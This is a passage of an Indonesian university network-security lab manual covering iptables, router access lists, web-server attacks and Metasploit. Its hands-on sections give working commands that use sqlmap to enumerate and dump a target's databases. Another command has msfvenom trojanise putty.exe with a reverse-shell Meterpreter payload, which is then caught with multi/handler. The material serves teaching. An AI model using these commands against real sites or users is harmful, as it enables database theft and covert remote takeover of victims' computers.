Iptables membuat suatu chain (rantai) untuk menggabungkan atau menyambungkan tabel-tabel tersebut menjadi satu perintah Iptables.



Chain (rantai) digambarkan sebagai jalur aliran data. Chain yang diperlukan untuk Iptables yakni antara lain : •



INPUT : Mengatur paket data yang memasuki firewall.







OUTPUT : Mengatur paket data yang keluar dari firewall ke arah intranet maupun internet. Biasanya output tidak diset karena bisa membatasi kemampuan firewall itu sendiri.







FORWARD : Mengatur paket data yang melintasi firewall dari arah internet ke intranet maupun sebaliknya. Biasanya paling banyak dipakai mengatur koneksi internet berdasarkan port, mac address dan alamat IP.



Sintaks umum iptables adalah sebagai berikut : # iptables



Dibawah ini adalah sedikit gambaran tentang bagaimana paket tersebut diperlakukan oleh iptables :



Keamanan Jaringan | 2018



57



• Perjalanan paket yang di-forward ke host yang lain 1. Paket berada pada jaringan fisik, misalnya di internet 2. Paket masuk ke interface jaringan, misalnya di eth0 3. Paket masuk ke chain PREROUTING pada tabel Mangle. Fungsi table mangle sendiri adalah untuk menghaluskan paket, seperti merubah TOS, TTL dan lain-lain. 4. Paket masuk ke chain PREROUTING pada table NAT. Chain ini fungsi utamanya untuk melakukan DNAT (Destination Network Address Translation) 5. Paket masuk dalam routing, menentukan apakah diproses oleh host lokal atau tidak. 6. Paket masuk ke chain FORWARD pada tabel filter. Pada chain ini proses pemfilteran paket terjadi 7. Paket masuk ke chain POSTROUTING pada tabel NAT. Chain ini fungsi utamanya untuk melakukan SNAT (Source Network Address Translation). 8. Paket keluar menuju interface jaringan, misalnya di eth1. 9. Paket paket kembali berada pada jaringan fisik, misalnya di LAN • Perjalanan paket yang ditujukan bagi host local 1. Paket berada pada jaringan fisik, misalnya pada internet. 2. Paket masuk ke interface jaringan,misalnya di eth0. 3. Paket masuk ke chain PREROUTING pada tabel Mangle. Yang bertujuan untuk menghaluskan paket. 4. Paket masuk ke chain PREROUTING pada tabel NAT. Chain ini fungsi utamanya



untuk



melakukan



DNAT (Destination Network Address



Translation). 5. Paket masuk dalam routing, menentukan apakah diproses oleh host lokal atau tidak. 6. Paket masuk ke chain INPUT pada tabel filter untuk di filter. 7. Paket diterima oleh aplikasi local.



Keamanan Jaringan | 2018



58



• Perjalanan paket yang berasal dari host local 1.



Aplikasi lokal menghasilkan paket data yang akan dikirimkan melalui jaringan.



2.



Paket memasuki chain OUTPUT di tabel mangle,yang bertujuan menghaluskan paket.



3.



Paket memasuki chain OUTPUT di tabel NAT.



4.



Paket memasuki chain OUTPUT di tabel filter yang bertujuan melakukan penyaringan terhadap paket yang keluar.



5.



Paket mengalami keputusan routing.



6.



Paket masuk ke chain POSTROUTING pada tabel NAT.



7.



Paket masuk ke interface jaringan, contoh eth0.



8.



Paket berada pada jaringan fisik, contoh internet.



6.3.4 Sintaks Iptables 1. Tabel Seperti yang sudah disebutkan tadi, iptable terdiri dari beberapa options, command, actions dan lain-lain. Tabel iptables memiliki 3 buah tabel yaitu NAT, Mangle, dan filter. Ketiga table ini digunakan berdasarkan fungsi nya masing masing. Fungsi dari masing-masing tabel tersebut adalah sebagai berikut: •



NAT : Digunakan untuk melakukan Network Address translation. NAT adalah penggantian field alamat asal atau alamat tujuan pada sebuah paket.







Mangle : Digunakan untuk melakukan penghalusan paket seperti merubah TOS, TTL dan lain-lain.







Filter : Digunakan untuk melakukan proses filter utama dalam firewall. Pada bagian ini ditentukan apakah paket akan di DROP, LOG, ACCEPT, atau REJECT.



Keamanan Jaringan | 2018



59



2. Command Command adalah salah satu baris perintah pada iptables untuk mengatur apa yang dilakukan pada sebuah chain. Berikut adalah sintax command dan keterangannya : Command



Keterangan



-A , --append



Digunakan untuk menambahkan aturan pada akhir chain . Aturan akan ditambahkan di akhir baris chain,sehingga akan dieksekusi terakhir. Digunakan untuk menghapus aturan pada chain.. Dilakukan dengan cara menyebutkan secara lengkap perintah yang ingin dihapus . Digunakan untuk merubah suatu aturan pada chain dengan aturan yang baru. Digunakan untuk menambah aturan pada suatu baris di chain. Aturan akan dimasukan pada baris yang disebutkan , dan aturan awal yang menempati baris tersebut akan digeser ke bawah . Digunakan untuk menampilkan semua aturan yang telah kita buat. Digunakan untuk menghapus aturan pada chain yang disebutkan.Jika nama chain tidak disebutkan,semua aturan yang telah dibuat akan dihapus. Perintah tersebut untuk membuat chain baru Digunakan untuk untuk menghapus chain yang disebutkan , Agar perintah ini berhasil tidak boleh ada aturan lain yang mengacu pada chain tersebut. Digunakan untuk merubah nama suatu chain Digunakan untuk membuat kebijakan default pada sebuah chain. Sehingga jika ada sebuah paket yang tidak memenuhi aturan pada baris-baris yang telah didefinisikan, maka paket akan diperlakukan sesuai dengan kebijakan default



-D, --delete -R, --replace -I , --insert



-L , --list -F, --flush -N , --new-chain -X , --delete-chain -E , --rename-chain -P , --policy



3. Options Options digunakan untuk membuat sebuah command lebih spesifik. Option



Command Pemakai



Keterangan



-v -- verbose



--list --append --insert --delete --replace --list



Memberikan output yang lebih detail tentang perintah apa yang baru di buat



-x --exact



Memberikan output yang lebih spesifik



Keamanan Jaringan | 2018



60



-n --numeric



--list



--line-number



--list



--modprobe



All



Memberikan output yang berbentuk angka. Alamat IP dan nomor port akan ditampilkan dalam bentuk angka dan bukan hostname atau nama service. Akan menampilkan nomor dari daftar aturan. Sehingga memudahkan kita untuk memodifikasi aturan. Jika kita mau menyisipkan atau menghapus aturan dengan nomor tertentu. Memerintahkan iptables untuk memanggil modul tertentu. Bisa digunakan bersamaan dengan semua command.



4. Generic Matches Salah satu jenis dari Matches, yaitu tempat pendefinisian berdasarkan apa paket akan di periksa. Generic matches adalah pendefinisian berdasarkan kriteria umum. Dengan kata lain sintak tersebut akan sama untuk semua protokol. Setelah protokol didefinisikan maka baru didefinisikan aturan yang lebih spesifik yang dimiliki oleh protokol tersebut. Match



Keterangan



-p , --protocol



Digunakan untuk mengecek tipe protocol tertentu. Contoh protocol yang umum adalah TCp, UDP, ICMP, dan ALL. Digunakan untuk mencocokan paket berdasarkan alamat IP asal paket. Alamat disini bisa berbentuk tunggal seperti 192.168.1.21/255.255.255.0 atau 192.168.1/24 yang artinya semua alamat 192.168.1.x . Digunakan untuk mencocokan paket berdasarkan alamat IP tujuan paket. Penggunaanya sama dengan match --src Digunakan untuk mencocokan paket berdasarkan dari interface mana paket datang. Match ini hanya berlaku pada INPUT , FORWARD dan PREROUTING. Digunakan untuk mencocokan paket berdasarkan interface dimana paket keluar. Match ini hanya berlaku pada INPUT,FORWARD dan PREROUTING.



-s, --src, --source



-d, --dst, --destination -I, --in-interface



o, --out-intrface



5. Implicit Matches Implicit Match merupakan sekumpulan rule yang akan di-load setelah tipe protokol disebutkan. Ada 3 Implicit Match berlaku, yaitu :



Keamanan Jaringan | 2018



61



• TCP Matches Match



Keterangan



--sport, --sourceport



Digunakan untuk mencocokan paket berdasarkan port asal. Dalam hal ini kita bisa mendefinisikan nomor port atau nama service nya. Daftar nama service dana nomor port yang bersesuaian dapat dilihat di /etc/services --sport juga bisa dituliskan untuk range port tertentu , misalkan ingin mendefinisikan antara port 20 sampai 80. Maka bisa menuliskan –sport 22:80. Jika bagian dari port tersebut dihilangkan seperti :80 berarti dari port 0 sampai port 80, sedangkan jika 20: , berarti dari port 20 sampai port 65535. Digunakan untuk mencocokkan paket berdasarkan port tujuan.Penggunaannya sama dengan --sport atau --source-port



--dport, -destinationport --tcp-flags



--syn



Digunakan untuk mencocokan paket berdasarkan UTP flag yang ada pada paket tersebut. Pertama , pengecekan akan mengambil daftar flag yang akan diperbandingkan . kedua akan memeriksa paket yang di set 1, atau on. Pada kedua list, masing-msaing entry nya harus dipisahkan oleh koma dan tidak boleh ada spasi antar entry, kecuali spasi antar kedua list. Match ini mengenali SYN, ACK, FIN,RST,URG,PSH .Selain itu , kita juga menuliskan ALL dan NONE . Match ini juga bisa menggunakan inverse. digunakan un4uk memeriksa apakah flag SYN di-set dan ACK dan tidak di-set . Perintah ini sama artinya jika kita menggunakan match --tcpflags SYN,ACK,FIN SYN. Paket dengan match diatas digunakan untuk melakukan request TCP yang baru terhadap server.



• UDP Matches Karena protokol UDP bersifat connectionless, maka tidak ada flags yang mendeskripsikan suatu koneksi telah dibuka atau ditutup karena Paket UDP tidak memerlukan acknowledgement. Sehingga Implicit Match untuk protokol UDP lebih sedikit daripada TCP. Ada dua macam match untuk UDP : --sport atau --source-port --dport atau --destination-port



Keamanan Jaringan | 2018



62







ICMP Matches Paket ICMP digunakan untuk mengirimkan pesan-pesan kesalahan dan kondisi-kondisi jaringan yang lain. Hanya ada satu implicit match untuk tipe protokol ICMP, yaitu : --icmp -type



6. Target atau Jump Target atau jump adalah tindakan yang dilakukan terhadap paket-paket yang memenuhi match yang telah kita tetapkan. Jump memerlukan sebuah chain yang lain dalam tabel yang sama. Chain tersebut nantinya akan dimasuki oleh paket yang memenuhi match. Analoginya ialah chain baru nanti berlaku sebagai prosedur/fungsi dari program utama. Sebagai contoh



dibuat



sebuah



chain



yang



bernama tcp_packets. Setelah



ditambahkan aturan-aturan ke dalam chain tersebut, kemudian chain tersebut akan direferensi dari chain input. # Iptables -A INPUT -p tcp -j tcp packet Target -j ACCEPT --jump ACCEPT



-j RETURN --jump RETURN



-j DROP --jump DROP



-j MIRROR



Keterangan Ketika paket cocok dengan daftar match dan target ini diberlakukan , maka paket tidak akan melalui baris-baris aturan yang lain dalam chain yang lain yang mereferensi chain tersebut . akan tetapi masih akan memasuki chain pada table yang lain seperti biasa. Target ini men-drop paket dan menolak untuk memproses lebih jauh. Dalam beberapa kasus mungkin hal ini kurang baik, karena akan meninggalkan dead socket antara client dan server . Paket yang menerima target DROP benarbenar mati dan target tidak akan mengirim informasi tambahan dalam bentuk apapun kepada client atau server. Target ini akan membuat packet berhenti menlintasi aturan-aturan pada chain dimana paket tersebut menemui target RETURN . jika chain merupakan subchain dari chain yang lain , maka paket akan kembali ke superset chain diatasnya dan masuk ke baris aturan berikutnya. Apabila chain adalah chain utama misalnya INPUT , maka paket akan dikembalikan kepada kebijakan default dari chain tersebut. Apabila komputer B melakukan koneksi http ke komputer A. Maka yang akan muncul pada browser adalah website komputer B itu sendiri. Karena fungsi utama target ini bekerja pada chain INPUT, FORWARD, dan PREROUTING atau chain buatan yang dipanggil melalui chain tersebut.



Keamanan Jaringan | 2018



63



7. Penggunaan IP Tables • Memblok akses HTTP dari firewall # iptables –v –A OUTPUT –p tcp –dport 80 –j DROP (HTTP) • Memblok akses HTTPS dari firewall # iptables –v –A OUTPUT –p tcp –dport 443 –j DROP (HTTPS) • Memblok akses PING / ICMP ke firewall # iptables –A INPUT –i eth2 –p ICMP –j DROP • Merubah alamat asal semua paket yang berasal dari interface eth0 menjadi 194.236.50.155 # iptables –t nat –A POSTROUTING –o eth0 –j SNAT –to-source 192.236.50.155



6.4



Langkah – Langkah Praktikum 6.4.1 Penggunaan Access List Buat lah topologi jaringan seperti dibawah ini :



1.



Konfigurasi PC • Konfigurasi pada PC0 IP Address : Subnet Mask : Default Gateway :



192.168.1.2 255.255.255.0 192.168.1.1



• Konfigurasi pada PC1 IP Address : Subnet Mask : Default Gateway :



192.168.1.3 255.255.255.0 192.168.1.1 Keamanan Jaringan | 2018



64



• Konfigurasi pada PC2 IP Address : Subnet Mask : Default Gateway :



192.168.2.2 255.255.255.0 192.168.2.1



• Konfigurasi pada PC3 IP Address : Subnet Mask : Default Gateway :



192.168.2.3 255.255.255.0 192.168.2.1



2. Konfigurasi Router Router> Router>enable Router#configure terminal Router(config)#interface fa0/0 Router(config-if)#ip address 192.168.1.1 255.255.255.0 Router(config-if)#no shutdown Router(config-if)#exit Router(config)#interface fa0/1 Router(config-if)#ip address 192.168.2.1 255.255.255.0 Router(config-if)#no shutdown 3. Lakukan Test ping untuk memastikan jaringan sudah terkonfigurasi dengan benar



4.



Setting Access List pada Router Router(config)#access-list 101 deny icmp host 192.168.1.2 host 192.168.2.2 echo Router(config)#access-list 101 permit ip any any Router(config)#int fa0/0 Router(config-if)#ip access-group 101 in Jika sudah terkonfigurasi dengan benar, maka paket dari PC0 yang memiliki Ip address 192.168.1.2 tidak akan bisa melakukan pengiriman paket icmp ke server.



Keamanan Jaringan | 2018



65



5. Setting extended access-list menggunakan port Pada praktikum kali ini akan menggunakan fungsi dari extended access-list menggunakan port www (80). Router(config)#access-list 101 deny tcp host 192.168.1.3 host 192.168.2.2 eq 80 Router(config)#access-list 101 permit ip any any Router(config)#int fa0/0 Router(config-if)#ip access-group 101 in Masuk ke PC1 lalu buka web browser ketikkan (ip server nya)



Keamanan Jaringan | 2018



66



MODUL 7 ATTACKING WEB SERVER 7.1



Tujuan Praktikum 1. Memahami Web Server 2. Mengetahui vulnerabilitas pada Web Server 3. Mengerti tentang teknik-teknik pengecekan vulnerabilitas seperti : a. Remote File Inclusion (RFI) b. Local File Inclusion (LFI) c. SQL Injection d. Cross Site Scripting (XSS) e. HTTPS f. Web deface 4. Dapat memeriksa keamanan web server dengan teknik SQL Injection.



7.2



Alat yang digunakan 1. VMware 2. Ubuntu 12.04 3. Windows (OS)



7.3



Dasar Teori 7.3.1 Pengenalan Web Server Web Server merupakan sebuah perangkat lunak dalam server yang berfungsi menerima permintaan (request) berupa halaman web melalui HTTP atau HTTPS dari klien yang dikenal dengan browser web dan mengirimkan kembali (response) hasilnya dalam bentuk halaman-halaman website yang umumnya berbentuk dokumen HTML. Berikut adalah contoh web server yang cukup populer dan banyak digunakan :



Keamanan Jaringan | 2018



67



1. Apache HTTP Web Server Proyek Apache HTTP Server adalah upaya untuk mengembangkan dan memelihara server HTTP open source untuk sistem operasi modern termasuk UNIX dan Windows NT. Tujuan dari proyek ini adalah untuk menyediakan server yang aman, efisien dan dapat diperluas yang menyediakan layanan HTTP disinkron dengan HTTP standar saat ini. 2. XAMPP Server XAMPP merupakan suatu perangkat lunak yang mendukung banyak sistem operasi, yang merupakan kompilasi dari beberapa program. Fungsinya adalah sebagai server yang berdiri sendiri (localhost), perangkat lunak ini terdiri atas Apache HTTP Server, MySQL database, compiler bahasa pemrograman PHP dan Perl. Nama XAMPP merupakan singkatan dari X (cross OS), Apache, MySQL, PHP dan Perl. Program ini tersedia dengan lisensi bebas dan opensource dan merupakan perangkat lunak yang paling banyak digunakan oleh web developer dalam pembuatan suatu website.



3. IIS Server Internet Information Service (IIS) adalah komponen yang dapat digunakan untuk mengelola web, File Transfer Protocol (FTP), Ghoper, dan NNTP. Komponen IIS terdapat pada sistem operasi Windows NT ,Windows 2000, Windows XP, 7 dan Windows Server 2003. Pada Windows 98, supaya dapat mengelola Web diperlukan komponen Personal Web Server (PWS) walaupun tidak terdapat fasilitas untuk FTP. PWS juga merupakan bagian dari IIS. Komponen PWS terdapat pada CD master Windows 98 dan terletak pada direktori add-onspws. Instalasi PWS dapat dilakukan dari :ADD-ONS|PWS|SETUP.



Komponen pendukung IIS antara lain : • Protocol jaringan TCP/IP • Domain Name System (DNS)



Keamanan Jaringan | 2018



68



• Direkomendasikan untuk menggunakan format NTFS demi keamanan. • Software untuk membuat situs web, salah satunya Microsoft FrontPage.



Pada pembahasan Internet Information Service ini, yang banyak dibahas adalah Internet Information Service yang terdapat pada Windows 2000 Server dan hanya terbatas pada Files Transfer Protocol (FTP) dan web saja. Kelebihan dan kekurangan dari IIS adalah sebagai berikut : • Lebih kompatibel dengan Windows karena memang IIS adalah keluaran Microsoft • Unjuk kerja untuk PHP lebih stabil, handal, dan cepat • Adanya kemampuan diagnostik untuk pelacakan kesalahan (bisa dikustomisasi) • Untuk platform .NET, user hanya bisa menggunakan IIS • Memiliki score tertinggi dari web server lainnya untuk masalah bug • Tidak gratis (web server berbayar) • Port 80 (Port untuk layanan web) sangat mudah diserang oleh cracker • Keamanan file log juga sangat mudah ditembus sehingga system password pun akan mudah didapatkan



7.3.2 Vulnerability Vulnerability atau celah keamanan adalah suatu kelemahan yang mengancam nilai integrity, confidentiality dan availability dari suatu aset. Vulnerability tidak hanya berupa software bugs atau kelemahan security jaringan. Namun kelemahan seperti pegawai yang tidak ditraining, dokumentasi yang tidak tersedia maupun prosedur yang tidak dijalankan dengan benar. Vulnerability bisa dikategorikan ke dalam tiga bagian, yaitu kelemahan pada sistem itu sendiri, jalur akses menuju kelemahan sistem, serta kemampuan dari seorang hacker untuk melakukan attacking. (Hanif Santoso, dkk).



Keamanan Jaringan | 2018



69



7.3.3 HTTPS HTTP Secured merupakan versi aman dari HTTP, protokol komunikasi dari WWW. Ditemukan oleh Netscape Communication Corp. Untuk menyediakan autentikasi dan komunikasi tersandi (encrypted). Selain menggunakan komunikasi plain text, HTTPS menyandikan data sesi menggunakan protokol SSL (Secure Socket Layer) atau protokol TLS (Transport Layer Security). Kedua protokol tersebut memberikan perlindungan yang memadai dari serangan eavesdroppers, dan serangan “man in the middle”. Pada umumnya port HTTPS adalah 443 7.3.4 Web Deface Web Deface dapat diartikan sebagai aktivitas merubah isi suatu halaman web yang bukan haknya dengan kalimat, gambar, atau link tertentu yang tidak ada sangkut-pautnya dengan misi web tersebut. Biasanya peretas men-deface suatu halaman web memiliki maksud supaya eksistensinya diketahui oleh khalayak ramai.



7.3.5 Cross Site Scripting (XSS) Cross site scripting adalah kelemahan keamanan yang terjadi pada penggunaan teknologi dynamic page. Cross site scripting dapat diartikan sebagai kelemahan yang terjadi akibat ketidak mampuan server dalam memvalidasi input yang diberikan oleh pengguna. Algoritma, yang digunakan untuk pembuatan halaman yang diinginkan, tidak mampu melakukan penyaringan terhadap masukkan tersebut. Hal ini memungkinkan halaman yang dihasilkan menyertakan perintah yang sebenarnya tidak diperbolehkan. Cross site scripting merupakan kelemahan yang populer untuk dieksploitasi. Namun sayangnya, banyak penyedia layanan yang tidak mengakui kelemahan tersebut dan melakukan perubahan pada sistem yang mereka gunakan. Citra penyedia layanan merupakan harga yang dipertaruhkan ketika mereka mengakui kelemahan tersebut. Sayangnya dengan tindakan ini konsumen atau pengguna menjadi pihak yang dirugikan.



Keamanan Jaringan | 2018



70



7.3.6 File Inclusion Local File Inclusion (LFI) dan Remote File Inclusion (RFI) merupakan jenis serangan dimana dimana penyerang mampu melakukan penyusupan dengan memanfaatkan direktori transversal pada server. LFI atau RFI ini biasanya digunakan untuk mendapatkan file /etc/passwd pda sistem operasi linux. File ini berisi tentang informasi user pada sebuah sistem linux.



7.3.7 SQL Injection SQL Injection merupakan suatu teknik menginjeksian kode SQL kedalam sebauh web yang memiliki kelemahan dalam penyaringan input data ke database. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter string yang berupa kode SQL.



7.4



Langkah-Langkah Praktikum 7.4.1 SQL Injection 1. Siapkan ubuntu lalu masuk ke root 2. Pilih direktori /home/[username] # cd /home/[username] 3. Download sqlmap # wget [alamat ip]/sqlmap.tar.gz 4. Ekstrak file sqlmap.tar.gz # tar –xvf sqlmap.tar.gz 5. Setelah itu kita akan mendapatkan folder dengan nama “sqlmapprojectsqlmap-779db7c”.



6. Pilih direktori sqlmap tersebut # cd sqlmapproject-sqlmap-779db7c/ && ls 7. Ubah file permission “sqlmap.py” menajadi 7777



Keamanan Jaringan | 2018



71



# chmod –c 7777 sqlmap.py



8. Lakukan vulnerability test pada suatu website # ./sqlmap.py –u [alamat website] 9. Tunggu beberapa saat sampai sqlmap memberikan laporan vulnerability testnya.



10. Setelah melakukan vulnerability test, sqlmap akan menampilkan laporan seperti berikut.



Gambar



diatas



menunjukan



parameter-parameter



yang



memiliki



kemungkinan untuk di injeksi dan kode SQL yang diinjeksikan oleh sqlmap melalui alamat web.



Keamanan Jaringan | 2018



72



11. Untuk mendapatkan list database yang berada pada server target, lakukan perintah berikut. # ./sqlmap.py –u [alamat website] –dbs



12. Setelah itu kita dapat melihat seluruh database yang berada pada server mysql target.



13. Untuk menampilkan tabel dan kolom yang berada pada satu database, gunakan perintah berikut. # ./sqlmap.py –u [alamat website] --tables --columns -D [nama database]



14. Dari perintah diatas kita akan mendapatkan seluruh informasi mengenai tabel dan kolom yang terdapat pada server target, termasuk tabel user yang sangat krusial.



Keamanan Jaringan | 2018



73



15. hal terakhir dan yang menjadi tujuan peretas adalah untuk mendapatkan data dari server database target, untuk mendapatkan data dari database target, lakukan perintah berikut. # ./sqlmap.py –u [alamat website] --dump -D [nama database] –T [nama tabel] 16. Dengan begitu kita dapat melihat seluruh isi database dari server target.



17. Untuk melihat log file dari sqlmap dapat dilihat pada direktori /root/.sqlmap/output/[alamat web]



Keamanan Jaringan | 2018



74



MODUL 8 UJI KOMPETENSI PRAKTIKUM 2 - KEAMANAN JARINGAN 8.1



Virtual Private Network 1. Konfigurasi IP DHCP server • Konfigurasi IP Pool • Setting DHCP server pada interface mikrotik • Tes DHCP server 2. Konfigurasi VPN Server • Setting profile VPN • Aktifkan server VPN • Create user VPN 3. Setting VPN client



8.2



Firewall dan Access List 1. Setting IP 2. Setting interface access list 3. Setting rule access list 4. Tes konfigurasi



8.3



Attacking Web Server 1. Mencari injectable URL 2. Melakukan vulnerability test 3. Melihat semua database 4. Melihat table pada salah satu database 5. Melihat kolom pada salah satu table 6. Melihat data dalam table menggunakan SQL Query



Keamanan Jaringan | 2018



75



MODUL 9 UJI KOMPETENSI TEORI 2 - KEAMANAN JARINGAN 9.1



Virtual Private Network 1. Private network 2. Remote access 3. Authentication 4. Access Control 5. Confidentiality 6. Data Integrity 7. Encryption 8. Tunneling 9. PPTP, L2TP, IPSec,dan Socks.



9.2



Scanning and Footprinting 1. Dasar firewall 2. Access Control List 3. Statefull Filtering 4. Stateless Filtering 5. Network Address Translation



9.3



Web Security System 1. Definisi web server 2. Remote File Inclusion (RFI) 3. Local File Inclusion (LFI) 4. SQL Injection 5. Cross Site Scripting (XSS) 6. HTTPS 7. Web Deface



Keamanan Jaringan | 2018



76



MODUL 10 METASPLOIT 10.1 Tujuan Praktikum 1. Praktikan mengenal dan memahami konsep dasar eksploitasi dengan metasploit. 2. Praktikan dapat melakukan eksploitasi sederhana menggunakan metasploit. 3. Praktikan mengenal dan memahami konsep dasar backdoor. 4. Praktikan dapat melakukan instalasi sederhana backdoor menggunakan metasploit.



10.2 Alat yang Digunakan 1. VMware 2. Ubuntu 12.04 3. Windows



10.3 Dasar Teori 10.3.1 Metasploit The Metasploit Project adalah proyek yang dikembangkan oleh Rapid7, proyek ini mengembangkan sistem yang menyediakan informasi kerentanan pada suatu kemanan komputer dan mengembangkan source code yang memungkinkan



suatu



jaringan



masuk



ke



jaringan



sendiri



untuk



mengidentifikasi resiko keamanan pada jaringan tersebut. Metasploit ini juga kadang bisa menjadi software penyerang ke sistem komputer yang mencari kelemahan dalam keamanannya, dan agar dapat memperoleh akses ke data dan fitir-fitur dari komputer tersebut. Penciptaan proyek yang paling terkenal adalah Metasploit Framework. Metasploit Framework adalah sebuah platform perangkat lunak untuk mengembangkan, menguji, dan melaksanakan eksploitasi. Metasploit awalnya diciptakan sebagai alat jaringan portable oleh HD Moore pada tahun 2003 kemudian diakuisisi oleh perusahaan keamanan jaringan Rapid7 pada tahun 2009. (TechTarget, 2011)



Keamanan Jaringan | 2018



77



Gambar 10.1 Alur sistem kerja dari Metasploit Framework



10.3.2 Metasploit Interface Banyak interface yang dikembangkan dan disediakan oleh Metasploit, contohnya: Metasploit Framework Edition, Metasploit Community Edition, Metasploit Express, Metaploit Pro, MSFConsole, MSFcli, Armitage, dsb. 1. MSFConsole MSFConsole merupakan salah satu interface dari Metasploit yang memungkinkan pengguna lebih efisien karena hampir semua fitur & pilihan tersedia di Interface ini. MSFConsole juga cocok sebagai bahan pembelajaran Metasploit.



Kelebihan MSFConsole : • Merupakan interface satu-satunya yang dapat mengakses sebagian fitur yang ada pada Metasploit. • Menyediakan interface berbasis konsol untuk framework. • Merupakan interface yang memiliki banyak fitur dan merupakan yang paling stabil. • Mendukung full read line, tabbing dan command completion.



Keamanan Jaringan | 2018



78



2. MSFcli Msfcli adalah cara lain untuk mengakses kerangka Metasploit tetapi lebih memfokuskan pada scripting dan interpretability dengan alat-alat lain berbasis konsol.



Kelebihan MSFcli : • Mendukung peluncuran eksploitasi dan modul tambahan. • Dapat menangani tugas tertentu yang lebih spesifik. • Baik untuk pembelajaran, karena tidak menggunakan fitur otomatis seperti yang dimiliki msfconsole. • Cocok digunakan untuk pengujian atau mengembangkan eksploitasi yang baru.



Kekurangan MSFcli : MSFcli hanya dapat menangani satu shell dalam satu waktu, sehingga lebih praktis untuk menggunakan serangan client-side.



3. Armitage Armitage adalah tampilan grafis dari MSFConsole, yang mana dapat mempermudah dan cepat dari pada menggunkan



MSFConsole, tapi



walaupun Armitage lebih mudah dari pada MSFConsole dan lebih cepat, tidak semua modul (aplikasi-aplikasi pendukung) yang ada di MSFConsole terdapat di Armitage. Armitage mampu digunakan untuk jaringan publik, dengan syarat server memiliki banyak service dan port yang terbuka.



Keamanan Jaringan | 2018



79



Gambar 10.2 Tampilan Grafis Amirtage 10.3.3 Modules Modul yang dimaksud adalah software pendukung yang digunakan oleh Metasploit Framework. • Payload Kode yang digunakan untuk mengeksekusi perintah pada sistem, kemudian kode ini dipilih dan disampaikan oleh framework untuk melakukan penetrasi. • Shellcode Shellcode adalah satu set instruksi yang digunakan sebagai payload ketika eksploitasi terjadi. Shellcode biasanya ditulis dalam bahasa assembly. • Exploit Pemanfaatan yang dilakukan oleh penyerang terhadap lemahnya suatu sistem untuk memperoleh keuntungan. • Listener Komponen pada metasploit yang menunggu koneksi masuk. • Encoders Memastikan bahwa payload sampai ketujuan • Auxiliary Sebagai pelengkap modul



Keamanan Jaringan | 2018



80



10.3.4 Meterpreter Meterpreter adalah fitur kuat dari metasploit yang menggunakan injeksi DLL untuk berkomunikasi melalui soket. Meterpreter bekerja pada sisi-klien dengan menyediakan lingkungan yang kuat untuk berkomunikasi, untuk mentransfer file.



10.3.5 Backdoor Backdoor adalah salah satu jenis trojan yang sering digunakan untuk mengontrol suatu komputer dari jarak jauh melalui jaringan baik lokal maupun Internet. Ciri khas backdoor adalah berjalan secara tersembunyi, tidak menampilkan hal-hal yang mencurigakan, serta membuka port agar komputer dapat diakses secara remote. Backdoor dapat juga disebut sebagai Remote Access Trojan atau Remote Administration Tool (RAT). Contoh trojan backdor (RAT) adalah Posion Ivy, Bifrost, Optix Pro, DarkComet-Rat, XpertRAT, Back Orifice dan Sub Seven (Sub7). Trojan backdoor merupakan jenis malware yang sangat berbahaya. Pasalnya, selain pencurian data, komputer korban dapat dijadikan zombie untuk menyerang server. Berdasarkan suatu situs berita Jerman, seorang warga negara Jerman menyewa jasa zombie dari Rusia dengan kisaran $65 per hari untuk melumpuhkan beberapa situs judi online saat piala dunia diselenggarakan. Selain reputasi IP pada komputer korban menurun, bandwidth terkuras, kecepatan akses dan kinerja sistem pun berkurang.



Cara kerja Trojan Backdoor Ada dua bagian backdoor, yaitu client dan server. Client adalah program yang diinstal di komputer target sedangkan server merupakan program yang digunakan attacker dalam mengoperasikan komputer target. Ada dua metode komunikasi antara client dan server yaitu direct connection dan reverse connection. Pada direct connection, server berusaha melakukan koneksi ke IP target agar dapat berkomunikasi dengan client. Tapi hal ini lebih mudah diblok oleh program firewall.



Keamanan Jaringan | 2018



81



Pada reverse connection tidak membutuhkan IP target karena serverlah yang berusaha melakukan koneksi ke IP client (attacker). Ketika attacker menjalankan client dengan koneksi Internet lain, IP pun akan berubah, lalu bagaimana membuat IP client yang bersifat taktis? Untuk mengatasi hal ini, attacker dapat memakai dynamic DNS yang banyak disediakan secara gratis oleh website-website tertentu.



10.4 Langkah-Langkah Praktikum 10.4.1 Instalasi Metasploit pada Ubuntu 12.04 1.



Update repository # sudo apt-get update



2. Masuk ke mode super user # sudo su 3. Buka direktori tempat file installer metasploit disimpan. 4. Rubah akses instalasi # chmod +x (nama file) 5. Jalankan installer atau setup dari Metasploitnya dan install secara default. 6. # ./(nama file)



Keamanan Jaringan | 2018



82



7. Masih di terminal, install paket-paket pendukungnya # sudo apt-get install postgreSQL rubygemslibpq-dev libreadline-dev ruby-dev nmap # wget http://the.earth.li/~sgtatham/putty/0.65/x86/putty.exe



8. Lalu, jalankan perintah berikut ini : # msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 –x /home/shivan/Downloads/putty.exe –k –e x86/shikata_ga_nai –i 10 –f exe > /home/shivan/bad_putty.exe



Keamanan Jaringan | 2018



83



Keterangan : • Msfvenom Perintah untuk menjalankan framework msfvenom, yaitu kombinasi antara framework msfpayload dan msfencode. Framwork ini dapat memudahkan kita untuk membuat program bakcdoor trojan. • -p Jenis payload yang akan digunakan. • LHOST IP lokal perangkat kita. • LPORT Port lokal yang terbuka. • -x Program yang akan kita buat menjadi trojan backdoor. • -k Perintah agar sistem yang menjalankan program trojan backdoor tadi akan membaca payload yang diberikan pada program tersebut. • -e Perintah untuk meng-encode. • x86/shikata_ga_nai Perintah encode default untuk membuat program backdoor. • -i iterasi atau berapa kali kita ingin meng-encode program yang inign kita buat. • -f Format yang akan kita gunakan.



Keamanan Jaringan | 2018



84



9. root@pinguin:/home/ # msfconsole



Keamanan Jaringan | 2018



85



10. msf>use exploit/multi/handler msf exploit(handler) >set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST msf exploit(handler) >set LPORT msf exploit(handler) >exploit 11. Jalankan program “bad_(nama aplikasi).exe” pada komputer client, maka meterpreterpun berhasil dijalankan.



Keamanan Jaringan | 2018



86



MODUL 11 DIGITAL FORENSIK 11.1 Tujuan Praktikum 1.



Dapat mengetahui fungsi-fungsi Digital Forensik



2.



Dapat menggunakan Tools Digital Forensik



3.



Dapat mengembalikan data yang telah dihapus



11.2 Alat yang Digunakan 1.



FTK Imager



2.



HashMyFiles



3.



DiskDigger



